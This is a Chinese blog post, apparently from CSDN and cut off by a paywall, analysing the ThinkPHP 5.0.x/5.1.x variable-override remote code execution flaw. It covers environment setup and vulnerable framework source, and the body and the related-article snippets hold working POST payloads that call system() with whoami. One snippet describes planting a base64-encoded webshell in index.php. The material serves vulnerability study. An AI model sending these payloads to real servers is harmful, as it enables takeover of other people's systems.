[代码审计]ThinkPHP 5.0.x 变量覆盖导致的RCE分析

最新推荐文章于 2024-09-08 19:36:27 发布
最新推荐文章于 2024-09-08 19:36:27 发布
阅读量5.5k 收藏 2
点赞数 9
分类专栏: 代码审计 文章标签: php web安全 渗透 thinkphp 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/121413362
版权
本文详细分析了ThinkPHP 5.0.x和5.1.0-5.1.30版本中的一个严重安全漏洞,该漏洞可能导致远程代码执行(RCE)。通过变量覆盖,攻击者可以控制特定函数执行,进而影响系统安全。文中介绍了漏洞的环境搭建、触发条件、漏洞原理及利用过程,并对此进行了深入的代码审计,揭示了漏洞链的复杂性。
摘要由CSDN通过智能技术生成

前言

漏洞存在版本,分为两大版本:

  • ThinkPHP 5.0-5.0.24

  • ThinkPHP 5.1.0-5.1.30

环境搭建

composer create-project topthink/think=5.0.5 thinkphp5.0.5  --prefer-dist

修改composer.json

"require": {
    "php": ">=5.4.0",
    "topthink/framework": "5.0.5"
},

执行composer update
访问public/index.php
在这里插入图片描述

漏洞分析

payload:

_method=__construct&method=get&filter[]=system&get[]=whoami

在thinkphp/library/think/Request.php中的method方法里面

public function method($method = false)
    {
   
        if (true === $method) {
   
            // 获取原始请求类型
            return IS_CLI ? 'GET' : (isset($this->server['REQUEST_METHOD']) ? $this->server['REQUEST_METHOD'] : $_SERVER['REQUEST_METHOD']);
        } elseif (!$this->method) {
   
            if (isset($_POST[Config::get('var_method')])) {
   
                $this->method = strtoupper($_POST[Config::get('var_method')]);
                $this->{
   $this
最低0.47元/天 解锁文章
huamanggg
关注
专栏目录
ThinkPHP5.0.5_变量覆盖导致RCE漏洞分析
11-21 1485
TP5.0.5_变量覆盖导致RCE漏洞分析 TP的RCE漏洞有两个大版本的区别 TP 5.0-5.0.24 这个RCE5.0.13之后的版本需要开启debug模式 TP 5.1.0-5.1.30 POChttp://localhost:8009/public/index.php POST: _method=__construct&method=GET&filter[]=system&s=whoami 漏洞分析 在经过App::routeCheck()->Ro
thinkphp5.0.X 全版本变量覆盖导致RCE分析
小石的博客
11-12 2476
thinkphp5.0.0分析起 POST /thinkphp5.0.0 HTTP/1.1 Host: www.example.com a=whoami&_method=__construct&filter=system&method=GET 5.0.0版本为什么是这样的Payload? 第一次调用Request下的method方法,看到是检查路由的时候。 _met...
thinkphp5.0.x RCE
fmyyy1的博客
07-28 605
ThinkPHP 5.0.x (<=5.0.23) 5.0.23->5.0.24 对method方法添加了过滤,该方法为获取请求类型,5.0.24中只允许method为常用的几个方法,否则就将其置为POST方法。 在/thinkphp/library/think/Request.php下的filterValue函数下的第五行,调用了call_user_func()方法 private function filterValue(&$value, $key, $filters)
ThinkPHP5 5-rce远程代码执行漏洞复现
最新发布
A2893992091的博客
09-08 590
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。我们知道了一定存在index.php这个文件,那么我们就对其进行修改为一句话木马的样式。由于存在过滤,需要用到base64加密来使我们的一句话木马上传成功。成功回显出aabb,说明是加入到了index.php里了。开始用蚁剑,URL地址填写我们一句话木马的位置。端口为:8080,访问网站,搭建成功。(1)输出关于 PHP 配置的信息。将一句话写入index.php
ThinkPHP5.0.5RCE
1stPeak's Blog
08-06 1007
访问 http://xx.xx.xx.xx:8080/index.php/?s=captcha payload: _method=__construct&filter[]=system&method=GET&get[]=系统命令 示例如下: post传入_method=__construct&filter[]=system&method=GET&get[]=whoami进行命令执行 post传入_method=__construct&filter
ThinkPHP5 Request类method任意方法调用RCE
weixin_43610673的博客
01-24 1510
此时的调用链如下,由array_walk_recursive调用filterValue函数,完成命令执行。从上面可以看到,filter变量清除在module分支中完成的,通过进入其他进行绕过分支。此时的触发点位于记录路由和请求信息的部分,这也是为什么需要开启debug选项。5.0.13版本之前无需开启debug就能rce,之前的版本中下图代码不会在。中重新再设置一次默认filter,这就会覆盖传入的恶意filter类属性。之前的版本仅在路由调度之前进行设置filter,的键名同名的类属性赋值为。
PHPrce函数,Thinkphp5-1-2-RCE简单分析
weixin_30332165的博客
04-12 480
前言上次出的洞是接近元旦吧,好像刚从南京回学校,要准备烦人的期末,没心思分析,前天我刚考完,今天刚爆的洞洞貌似。然后自己跟着调试了一下。漏洞细节这是复现图前提是要在index.php中禁止报错,其实在生产环境中,开发也会这么做。漏洞点在\thinkphp\library\think\Request.php中的method函数:public function method($origin = fal...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1....通过以上分析可以看出,ThinkPHP 5.0.x/5.1.x中的变量覆盖RCE漏洞是由于不安全的数据处理和变量管理造成的。开发者应加强对框架内部实现的理解,并遵循最佳安全实践,以减少类似的安全风险。
ThinkPHP 3.2.x RCE漏洞复现
m0_46616663的博客
11-29 2290
打湖湘杯遇到一个类似的willphp题目,都审到cfile了没做出来。。。于是把这个翻出来搞了一波,过程参考了网上别的师傅的0.0 什么是ThinkPHP ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不
代码审计ThinkPHP 5.0-5.0.23RCE
m0_63581584的博客
11-23 666
2.2,回到app->run方法中。调用call_user_func(),造成RCE。2.1 第一步造成变量覆盖。进入App-run()方法。这里debug开启,即进入。2.开始进行RCE分析
ThinkPHP--5.0.23-rce远程代码执行
m0_74402888的博客
05-03 748
实现框架的核心类Requests的method方法实现表单请求类伪装,默认为$_POST[‘_method’]变量,却没有对_method属性进行严格校验,可以通过变量覆盖Requests类的属性,在结合框架特性实现对任意函数的调用实现任意代码执行。攻击者可向缓存文件内写入PHP代码,导致远程代码执行。
学习笔记-ThinkPHP5之任意方法调用RCE(六)
人饭子的博客
11-09 467
书接上文 利用method的任意方法调用,调用构造函数__construct,且调用时会传入$_POST数据,那么组合起来就是执行method方法可以控制类的成员变量的值。 filterValue中存在 call_user_func函数可以恶意利用,关注其参数$filters是否可控。 getFilter方法存在这样$filter = $filter ?: $this->filter;...
Thinkphp 缓存RCE
weixin_30635053的博客
06-16 601
5.0.0<=ThinkPHP5<=5.0.10。 漏洞利用条件: 1.基于tp5开发的代码中使用了Cache::set 进行缓存 2.在利用版本范围内 3.runtime目录可以访问 扩展: 1.不可访问,可以考虑包含。前提要找到包含处。//Tp有一个Cache一个包含 2.利用缓存,做一个长期的shell动态生成。 ...
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
热门推荐
陈瘦瘦的迪迦的博客
12-08 1万+
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现 漏洞形成原因 框架介绍: ThinkPHP是一款运用极广的PHP开发框架。 漏洞引入: 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 漏洞如何利用 1、访问靶机地址+端口号 进入首页 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&meth
thinkphp5 RCE漏洞复现
feng的博客
03-03 3517
前言 之前看的是tp3的SQL注入,现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE,毕竟thinkphp最广为人知的漏洞就是RCE。 首先是源码的下载,我从这里下载: thinkphp下载 这里我下载的是thinkphp5.0.22完整版,如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样,RCE的执行点也都是重要的request类。关键在于这个filterValue()函数: /** * 递归过滤给定的值 * @param mixe
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 941
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
ThinkPHP V5的RCE(远程代码执行漏洞)
Home to come
04-18 2150
一、Shell脚本基础知识 1.Shell 输入/输出重定向 常见重定向符号: 1)标准输出 > 覆盖重定向 set -C 关闭覆盖重定向的功能 set +C:恢复 >| 强制重定向 >> 追加重定向 2)标准输入 < a<b :把b交给a执行 tr 替换文件内容(tr set1 [set2])char(字符:一个...
Thinkphp 5.0.24变量覆盖漏洞导致RCE分析
bhegi_seg的博客
07-31 1309
好了,回到正题,继续跟进到877行,
thinkphp5.x系列 RCE总结
weixin_30672019的博客
05-11 2863
Thinkphp MVC开发模式 执行流程: 首先发起请求->开始路由检测->获取pathinfo信息->路由匹配->开始路由解析->获得模块、控制器、操作方法调度信息->开始路由调度->解析模块和类名->组建命名空间>查找并加载类->实例化控制器并调用操作方法->构建响应对象->响应输出->日志保存->程序...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值